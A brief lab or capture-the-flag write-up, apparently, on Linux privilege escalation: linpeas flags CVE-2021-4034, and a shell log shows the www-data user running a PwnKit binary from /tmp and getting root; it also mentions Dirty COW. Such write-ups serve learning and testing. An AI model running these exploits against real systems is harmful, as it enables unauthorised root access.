Priv Escalation

pwn kit worked

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.7.2p1

Vulnerable to CVE-2021-4034

./linpeas.sh: 1322: systemctl: not found
./linpeas.sh: 1322: [[: not found
./linpeas.sh: 1322: rpm: not found
./linpeas.sh: 1322: 0: not found
www-data@offsecsrv:/tmp$ chmod +x PwnKit32
chmod +x PwnKit32
www-data@offsecsrv:/tmp$ ./PwnKit32
./PwnKit32
expr: syntax error
stdin: is not a tty
ls
�@@�@8@@@��
PwnKit
PwnKit32
linpeas.sh
shell.sh
socat
vmware-root
whoami
root

It is also vulnerable to dirtycow exploit.

Last updated